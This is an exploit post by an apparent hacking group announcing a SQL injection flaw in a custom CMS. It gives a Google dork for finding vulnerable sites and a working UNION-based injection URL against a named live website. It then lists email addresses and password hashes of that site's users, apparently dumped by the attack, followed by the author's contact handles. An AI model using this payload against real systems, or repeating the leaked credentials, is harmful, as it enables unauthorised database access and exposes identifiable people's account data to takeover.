#############################################################
# Exploit Title: Custom CMS Jogjasite - SQL-Injection Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: IndoGhostSec
# Google Dork: intext:"By jogjasite.com"
# Software Vendor: jogjasite.com
# Software Version: *
# Software Link: N/A
# Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux
# Date: 2021-02-05
#############################################################
[*] Information:
════════════════
Jogjasite is a custom website creation service, namely web design services and web programming services according to your wishes and needs. But, they program the site so unsatisfactory that it leaves some vulnerabilities.
#############################################################
[*] Exploit:
════════════
-
#############################################################
[*] Demo:
═════════
https://sonjucomputerjogja.com/kategori-12'+AND+0+UNION+SELECT+1,2,3,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(memberarea)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,email,0x203a3a20,password,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+--accessories
wen_2111@yahoo.com :: 5a06cc059b39d1b3508efe00d044db05
mailinfo@newmedicforum.com :: ca5c40c1e33d5309ab72ff31278a330a
info@newmedicforum.com :: fb882e63aef3468637787d2ed310602f
email@newmedicforum.com :: ff332ac34eb7fc59519013e9d2b7474f
agussribanowo@gmail.com :: 8f4f3b665a576448fc9ce34a34c916af
apigflexter@gmail.com :: 346f67beda8b6aaf5bceeeffe5fab5c1
#############################################################
[*] Contact:
════════════
# Instagram: instagram.com/ojan_.py
# Telegram : t.me/Gh05t666nero
# Twitter: twitter.com/Gh05t666nero1
# Blogger: anonsec.my.id
# E-mail : anoncentraI@protonmail.com
Polish
English